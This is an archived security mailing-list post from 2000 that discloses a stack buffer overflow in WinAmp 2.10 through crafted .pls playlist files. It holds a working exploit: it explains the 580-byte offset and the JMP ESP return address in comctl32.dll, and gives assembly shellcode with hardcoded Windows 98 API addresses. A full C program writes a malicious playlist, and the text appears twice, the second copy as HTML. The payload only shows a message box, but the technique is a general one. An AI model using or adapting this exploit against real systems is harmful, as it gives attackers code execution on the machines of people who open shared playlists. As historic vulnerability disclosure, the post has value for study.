|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Buffer overflow with WinAmp 2.10
Subject: Buffer overflow with WinAmp 2.10
From: Transfer Interrupted (t-i
GMX.NET)
Date: Sun Jan 09 2000 - 04:21:31 CST
- Next message: redhat-watch-listREDHAT.COM: "[RHSA-2000:002] New lpr packages available"
- Previous message: Dildog: "L0pht Advisory: LPD, RH 4.x,5.x,6.x"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi!
There's a stack based buffer overflow in WinAmp 2.10 (Win 98) which allows an user to
execute arbitrary code. Here's the source code and some better intro!
Be careful,
Transfer Interrupted
-- "This vulnerability is completely theoretical!" -Microsoft
Author: Steve Fewer, darkplanoceanfree.net
http://indigo.ie/~lmf
Introduction:
I recently uncovered a stack based buffer overflow in winamp version 2.10 which lets me execute 'arbitrary code'. It is=20 carried out through .pls files which winamp uses for playlists.=20 This is unnerving as it is a feasible plan to trade playlists on irc during a mp3 trading session with someone.
The overflow occurs when an entry greater than 580 bytes is=20 read in from a .pls file. The EIP is the only register overwritten=20 in the next four bytes that follow, from there on is space for=20 your shell code. eg.
[playlist] File1=3D<580 bytes><eip><shell code> NumberOfEntries=3D1 =20
The first 580 bytes get mangled around in memory but the 585=20 byte (where our shell code starts) is pointed to by the ESP,=20 therefore a simple 'JMP ESP' or the like will land us back in=20 our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in=20 comctl32.dll which winamp loads. Pointing our EIP into that=20 address lands us back where we want to be.=20
This was all created/tested on Windows 98 [Version 4.10.1998] running on an Intel PII400 with 128MB RAM.
The Shell Code:
The shell code I wrote for this simply displays a message box=20 and then calls exit(). However Winamp doesn't load msvcrt.dll=20 which is needed to call exit() so we have to load it ourselves.=20 I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling Messagebox I used the address=20 0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I=20 used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It=20 didn't warrant using GetProcAddress for compatibilities sake. For the OP codes see the exploit further on.
// This loads msvcrt.dll push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0xBFF776D4 push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] // This calls MessageBox to say 'Hi!' push ebp mov ebp,esp xor edi,edi push edi mov byte ptr[ebp-04h],48h mov byte ptr[ebp-03h],69h mov byte ptr[ebp-02h],21h mov edx, 0xBFF5412E push edx push edi lea edx,[ebp-04h] push edx push edx push edi call dword ptr[ebp-08h] // This calls exit() push ebp mov ebp,esp mov edx,0xFFFFFFFF sub edx,0x87FFAAFB push edx xor eax,eax push eax call dword ptr[ebp-04h]
The Exploit:
<-snip->
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplanoceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include <stdio.h>
int main() {
printf("\n\n\t\t.......................................\n"); printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n"); printf("\t\t.......................................\n"); printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n"); printf("\t\t.........http://indigo.ie/~lmf.........\n"); printf("\t\t.......................................\n\n");
char buffer[640]; char eip[8] =3D "\xF7\xCF\xB9\xBF"; char sploit[256] =3D = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\= xFA\x2E\xC6 \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\= x45\xF4\x50 \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\= x45\xFE\x21 \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\= xEC\xBA\xFF \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=3D0;x<580;x++) { buffer[x] =3D 0x90; }
file =3D fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n"); fprintf(file, "File1=3D"); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); fprintf(file, "\nNumberOfEntries=3D1");
fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; }
<-snip->
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
------=_NextPart_000_0029_01BF56CF.4A7BA760 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20
advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20
Steve Fewer, <A=20
href=3D"mailto:darkplanoceanfree.net">darkplanoceanfree.net</A><BR>&nbs=
p;  =
; =20
<A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf><BR>-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =
buffer overflow=20
in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20
<BR>carried out through .pls files which winamp uses for playlists. =
<BR>This is=20
unnerving as it is a feasible plan to trade playlists on<BR>irc during a =
mp3=20
trading session with someone.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =
greater than 580=20
bytes is <BR>read in from a .pls file. The EIP is the only register =
overwritten=20
<BR>in the next four bytes that follow, from there on is space for =
<BR>your=20
shell code. eg.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20
bytes><eip><shell code><BR>NumberOfEntries=3D1 =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =
in memory=20
but the 585 <BR>byte (where our shell code starts) is pointed to by the =
ESP,=20
<BR>therefore a simple 'JMP ESP' or the like will land us back in =
<BR>our shell=20
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =
winamp=20
loads. Pointing our EIP into that <BR>address lands us back where we =
want to be.=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =
98 [Version=20
4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =
displays a=20
message box <BR>and then calls exit(). However Winamp doesn't load =
msvcrt.dll=20
<BR>which is needed to call exit() so we have to load it ourselves. =
<BR>I used=20
the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =
for<BR>LoadLibraryA(). For=20
calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =
(v4.10.1998)=20
and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20
(v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =
compatibilities=20
sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> // This loads=20
msvcrt.dll<BR> push ebp<BR> mov=20
ebp,esp<BR> xor eax,eax<BR> push=20
eax<BR> push eax<BR> push=20
eax<BR> mov byte =
ptr[ebp-0Ch],4Dh<BR> mov=20
byte ptr[ebp-0Bh],53h<BR> mov byte=20
ptr[ebp-0Ah],56h<BR> mov byte=20
ptr[ebp-09h],43h<BR> mov byte=20
ptr[ebp-08h],52h<BR> mov byte=20
ptr[ebp-07h],54h<BR> mov byte=20
ptr[ebp-06h],2Eh<BR> mov byte=20
ptr[ebp-05h],44h<BR> mov byte=20
ptr[ebp-04h],4Ch<BR> mov byte=20
ptr[ebp-03h],4Ch<BR> mov =
edx,0xBFF776D4<BR> =20
push edx<BR> lea eax,[ebp-0Ch]<BR> =
push=20
eax<BR> call dword ptr[ebp-10h]<BR> =
// This=20
calls MessageBox to say 'Hi!'<BR> push=20
ebp<BR> mov ebp,esp<BR> xor=20
edi,edi<BR> push edi<BR> mov byte=20
ptr[ebp-04h],48h<BR> mov byte=20
ptr[ebp-03h],69h<BR> mov byte=20
ptr[ebp-02h],21h<BR> mov edx, =
0xBFF5412E<BR> =20
push edx<BR> push edi<BR> lea=20
edx,[ebp-04h]<BR> push edx<BR> push=20
edx<BR> push edi<BR> call dword=20
ptr[ebp-08h]<BR> // This calls =
exit()<BR> =20
push ebp<BR> mov ebp,esp<BR> mov=20
edx,0xFFFFFFFF<BR> sub =
edx,0x87FFAAFB<BR> =20
push edx<BR> xor eax,eax<BR> push=20
eax<BR> call dword ptr[ebp-04h]</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =
for Winamp=20
v2.10<BR> * Author Steve Fewer, 04-01-2k. Mail me at <A=20
href=3D"mailto:darkplanoceanfree.net">darkplanoceanfree.net</A><BR>&nbs=
p;*<BR> *=20
For a detailed description on the exploit see my =
advisory.<BR> *<BR> *=20
Tested with Winamp v2.10 using Windows98 on an Intel<BR> * PII 400 =
with=20
128MB RAM<BR> *<BR> * <A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf><BR> */</FON=
T></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> =20
printf("\n\n\t\t.......................................\n");<BR> &nb=
sp; =20
printf("\t\t......Nullsoft Winamp 2.10 =
exploit.....\n");<BR> =20
printf("\t\t.......................................\n");<BR> &=
nbsp;=20
printf("\t\t.....Author: Steve Fewer, =
04-01-2k.....\n");<BR> =20
printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR> &=
nbsp;=20
printf("\t\t.......................................\n\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20
"\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=
\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=
x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=
bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=
C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=
\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=
xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for(int=20
x=3D0;x<580;x++)<BR> {<BR> =
buffer[x] =3D=20
0x90;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>file =3D =
fopen("crAsh.pls","wb");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>fprintf(file, =
"[playlist]\n");<BR>fprintf(file,=20
"File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20
eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20
"\nNumberOfEntries=3D1");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>fclose(file);<BR>printf("\t =20
created file crAsh.pls loaded with the exploit.\n");<BR>return=20
0;<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=
DY></HTML>
------=_NextPart_000_0029_01BF56CF.4A7BA760--
End of MIME message
- Next message: redhat-watch-listREDHAT.COM: "[RHSA-2000:002] New lpr packages available"
- Previous message: Dildog: "L0pht Advisory: LPD, RH 4.x,5.x,6.x"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Mon Jan 10 2000 - 18:52:02 CST